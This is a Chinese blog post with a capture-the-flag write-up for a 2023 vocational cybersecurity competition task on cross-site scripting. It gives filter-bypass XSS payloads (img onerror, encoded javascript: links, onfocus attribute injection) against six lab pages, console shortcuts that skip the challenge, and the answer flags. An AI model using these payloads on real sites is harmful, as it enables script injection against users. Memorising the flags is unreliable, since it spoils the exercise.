2023年中职“网络安全“—跨站脚本渗透①

已于 2023-11-15 14:57:41 修改
阅读量646 收藏 11
点赞数 6
分类专栏: 中职网络安全 文章标签: web安全 安全 网络安全 xss 安全性测试
于 2023-06-02 17:22:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57060854/article/details/131010570
版权
该文详细介绍了六个跨站脚本(XSS)渗透测试的解题方法,涉及URL编码、HTML注入、JavaScript触发等技巧,每个解法都以获取弹框信息作为flag提交,强调了对过滤机制的理解和实战经验的重要性。
摘要由CSDN通过智能技术生成

2023年中职"网络安全"—网络跨站脚本渗透①

跨站脚本渗透

任务环境说明:

 服务器场景:Server2125(关闭链接)
 服务器场景操作系统:未知

1. 访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/1/?name=</h2><img src=1 onerror=alert(1)>


解法二:F12打开控制台,输入 alert(1) 回车


解法三:F12打开控制台,输入 b64_md5('simple') 回车

flag:jb3aSPuHSNZ0bxllgk6Wag

2. 访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/2/index.php?keyword="</h2><img SRC=1 ONERROR=alert(1)>&submit=搜索


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('relaxed') 回车

flag:gfMr4koqYvxHLMQ+3JfmWw

3. 访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    先把javascript:alert(1)转换成HTML编码


    (1)输入进去,回车
    (2)然后在点击友情链接


解法二:
    在url中的keyword参数后输出javas%09cript:alert(1)
    然后在点击友情链接


解法三:F12打开控制台,输入 alert() 回车


解法四:F12打开控制台,输入 b64_md5('challenge') 回车

flag:sE7ArePUm0oHnw4gfV4oIQ

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    使用Win7的谷歌浏览器,发现了这些


    " οnfοcus="alert(1)" type=text "
    提交Cookie后点击一下input框,就会弹出来
    其他触发事件也可以,不值可以用onfocus


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('commonly') 回车

flag:nQO7ofm1/wzUgGBnrR55qg

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

我怀疑这题有问题,这题应该对应XSS-Labs第15关
解法一:F12打开控制台,输入 alert(1) 回车


解法二:F12打开控制台,输入 b64_md5('Uncomfortable') 回车

flag:QmRhA990viE8yP/PWbnKhw

6. 访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/6/?keyword=%3Cimg%0Asrc=1%0Dοnerrοr=alert()%3E


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('finis') 回车

flag:LHOm3XR7ig6+hgo2Zd/Y6g

总结

这种题目考的就是过滤,只要多打靶机,做起来还是没有问题的。
XSS-Labs

acaciaf
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023全国职业院校技能大赛中职网络安全竞赛试题B模块安徽省——跨站脚本攻击(超详细)
Jay
03-30 267
4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交
江西 网页渗透-21
zx66661的博客
04-25 896
1.访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交; 抓包 更改User-Agent:的内容 Flag:zTdKVpUKJu 2.访问服务器网站目录2,根据页面信息完成条件,将获取到的flag提交; 根据题目要求,添加ip,通过抓包获得flag Flag:6i3zXHDPOx 3.访问服务器网站目录3,根据页面信息完成条件,将获取到的flag提交 发现 payload = id=2' or sleep(3)#
2022网络安全”赛项驻马店市赛选拔赛 任务书
Aluxian_的博客
11-16 2234
2.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录唯一一个后缀为.bmp的图片文件的英文单词作为Flag提交;4.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/vsftpd目录唯一一个后缀为.docx文件的文件内容作为Flag提交;6.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/home/guest目录唯一一个后缀为.pdf文件的文件内容作为Flag提交
2024网络安全比赛--跨站脚本攻击中职组(超详细)_网络安全 技能大赛 攻击流程(4)
最新发布
2401_84558314的博客
05-12 857
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;✓ 服务器场景操作系统:未知。
2022-2023中职网络安全web渗透任务整理合集
旺仔Sec&blog
02-25 3328
2022-2023中职网络安全web渗透任务整理合集
2021江西省“网络安全”赛题B-10:网页渗透—21
依旧是寻觅
09-26 151
,访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交
中职网络安全C模块脚本.rar
06-09
中职网络安全python脚本 新规程C模块的脚本,有mysql、vsftpd和ping三个脚本,三个脚本结合使用渗透靶机获取flag,mysql、vsftpd都是linux渗透linux的,ping是windows和linnux都可使用,如购买有问题可私信博主
2023内蒙古自治区中职网络安全赛题-B模块
06-01
总的来说,2023内蒙古自治区的中职网络安全比赛B模块是对参赛者全面能力的检验,包括但不限于网络攻防、系统安全、数据取证、渗透测试和隐写术等关键技能。通过这样的比赛,参赛者不仅能提升自己的技术水平,还能...
2022中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境
07-06
【标题】"2022中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境"涉及的是网络安全领域的代码渗透测试,这是在中职教育阶段一项重要的技能竞赛,旨在提升学生的网络安全实战能力。磐云杯是这类竞赛的...
2023《网络建设与运维》国赛脚本文件及导出答案视频
03-16
2023的《网络建设与运维》全国职业技能大赛,参赛者们不仅需要掌握扎实的网络基础知识,还需要具备高效的问题解决能力和自动化运维技术。其,利用脚本文件进行网络管理和运维是现代网络环境不可或缺的一项...
2023中职组“网络安全”赛项吉安市任务书
05-31
"2023中职组“网络安全”赛项吉安市任务书" 该任务书涵盖了网络安全领域的多个方面,包括登录安全加固、本地安全策略设置、流量完整性保护、事件监控、服务加固、Windows 操作系统渗透测试、应急响应、系统提权、...
2023安徽省职业院校“磐云杯”网络安全竞赛
m0_45155797的博客
04-06 221
镜像名:Server2121操作有什么问题,麻烦师傅们指出!
B-8:网页渗透
m0_45155797的博客
04-13 450
B-8:网页渗透 任务环境说明:  服务器场景:Server2127(关闭链接)  服务器场景操作系统:未知 1. 访问服务器网站目录1,根据页面信息完成条件,将页面的flag提交; 2. 访问服务器网站目录2,根据页面信息完成条件,将页面的flag提交; 3. 访问服务器网站目录3,根据页面信息完成条件,将页面的flag提交; 4. 访问服务器网站目录4,根据页面信息完成条件,将页面的flag提交; 5. 访问服务器网站目录5,根据页面信息完成条件,将页面的flag提交; 6. 访问服务器
2023网络安全比赛--跨站脚本攻击中职组(超详细)
Aluxian_的博客
01-12 8354
1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;4.访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;5.访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交
web安全渗透测试
FogIslandBay的博客
09-20 3850
任务四:Web安全渗透测试 通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号的内容作为flag值并...
开封市第二届职业技能大赛 网络安全项目竞赛试题
旺仔Sec&blog
03-29 1249
1.在 JavaScript 语言,将给定的长字符串转换为一个数组的方法,将该方法应用于逆向解码操作(可执行文件位于 Server2023111301桌面逆向分析文件夹),所得的结果进行 Base64运算,将过程使用的方法作为Flag提交(例如:array.splice());5.通过本地PC渗透测试平台Kali对服务器场景 Server2007网站进行访问,登录成功后找到页面的十字星,将十字星页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交
2024网络安全竞赛-页面信息发现任务解析
旺仔Sec&blog
12-30 738
渗透服务器信息收集,将获取到的服务器网站端口作为Flag提交访问服务器网站页面,找到主页面的Flag信息,将Flag提交访问服务器网站页面,找到主页面脚本信息,并将Flag提交
了解一些xss漏洞绕过方式
贝隆的博客
02-05 1578
了解一些xss漏洞绕过方式
任务四:隐藏信息探索
m0_45155797的博客
04-15 201
任务四:隐藏信息探索 任务环境说明: ● 服务器场景:Web20200529 ● 服务器场景操作系统:未知 (关闭链接) 1. 通过本地PC渗透测试平台Kali对服务器场景Web20200529网站进行访问,找到登录界面的FLAG,并将FLAG提交; 2. 通过本地PC渗透测试平台Kali对服务器场景Web20200529网站进行访问,找到登录界面背景的FLAG,并将FLAG提交; 3. 通过本地PC渗透测试平台Kali对服务器场景Web20200529网站进行访问
2023中职网络安全江西 web安全渗透测试
09-22
2023中职教育网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值